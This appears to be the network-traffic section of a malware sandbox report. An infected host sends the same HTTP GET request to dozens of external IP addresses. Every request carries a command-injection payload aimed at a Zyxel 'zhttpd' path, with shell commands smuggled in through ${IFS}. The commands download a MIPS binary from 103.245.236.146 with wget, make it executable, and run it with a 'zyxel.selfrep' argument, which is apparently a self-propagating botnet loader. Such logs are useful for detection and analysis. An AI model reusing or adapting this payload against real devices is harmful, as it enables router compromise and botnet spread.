                                                        Jan 28, 2024 10:13:08.712438107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8373192.168.2.145651070.203.235.152443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.712491035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8374192.168.2.144602242.15.171.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.712532043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8375192.168.2.1448992115.178.22.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.712565899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8376192.168.2.14412004.123.250.35443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.712598085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8377192.168.2.1454470148.88.48.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.712645054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8378192.168.2.1453460119.180.170.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.712666035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8379192.168.2.144748038.42.143.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.712707996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8380192.168.2.1444154120.86.178.236443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.712728977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8381192.168.2.144719087.235.97.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.712765932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8382192.168.2.1436686109.101.17.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.712810040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8383192.168.2.1450904197.42.141.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.712852001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8384192.168.2.1452808194.140.175.28443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.712889910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8385192.168.2.143869492.182.195.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.712944031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8386192.168.2.143951269.248.90.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.712970018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8387192.168.2.143915698.251.62.73443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.713016033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8388192.168.2.1455046115.120.202.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.713061094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8389192.168.2.145993057.56.99.20443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.713099957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8390192.168.2.143602217.132.119.241443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.713135004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8391192.168.2.145928844.35.114.76443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.713181019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8392192.168.2.143503671.182.134.98443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.713219881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8393192.168.2.1434044113.199.74.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.713274956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8394192.168.2.14591142.233.213.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.713303089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8395192.168.2.1455816113.117.71.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.713349104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8396192.168.2.1436068219.237.171.238443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.713377953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8397192.168.2.145903446.6.81.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.713413954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8398192.168.2.143895878.156.77.98443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.713428020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8399192.168.2.1446126216.215.37.83443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.713474989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8400192.168.2.1460110203.160.98.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.713517904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8401192.168.2.1440522152.13.25.254443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.713546991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8402192.168.2.1441912206.252.223.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.713582993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8403192.168.2.145144465.26.14.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.713612080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8404192.168.2.145725485.31.0.26443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.713635921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8405192.168.2.1433952192.6.217.44443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.713690042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8406192.168.2.1443414132.65.206.56443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.713736057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8407192.168.2.144514897.249.4.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.713764906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8408192.168.2.1451928135.66.131.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.713810921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8409192.168.2.1443160192.118.166.206443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.713851929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8410192.168.2.1452820118.124.87.182443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.713892937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8411192.168.2.1453216184.127.178.162443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.713917971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8412192.168.2.1446000182.79.214.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.713963985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8413192.168.2.1458884186.232.221.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.713992119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8414192.168.2.143600691.164.162.173443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.714016914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8415192.168.2.144341647.231.142.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.714067936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8416192.168.2.145438225.133.132.75443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.714102983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8417192.168.2.1436876156.101.58.124443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.714140892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8418192.168.2.1453036110.202.79.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.714191914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8419192.168.2.1445502129.184.124.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.714232922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8420192.168.2.1450596162.191.77.156443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.714277029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8421192.168.2.144825467.237.127.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.714323044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8422192.168.2.143651268.33.166.62443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.714354038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8423192.168.2.1437722143.158.28.87443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.714384079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8424192.168.2.144577859.213.3.71443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.714420080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8425192.168.2.14486384.244.128.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.714474916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8426192.168.2.1436944190.255.202.26443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.714497089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8427192.168.2.1439860207.232.48.120443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.714534998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8428192.168.2.1457442105.182.94.173443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.714562893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8429192.168.2.145894437.89.59.153443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.714601040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8430192.168.2.1442900200.152.46.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.714639902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8431192.168.2.1445280108.151.3.152443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.714684010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8432192.168.2.1451034172.237.41.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.714745045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8433192.168.2.1459230169.188.143.220443
                                                        TimestampBytes transferredDirectionData
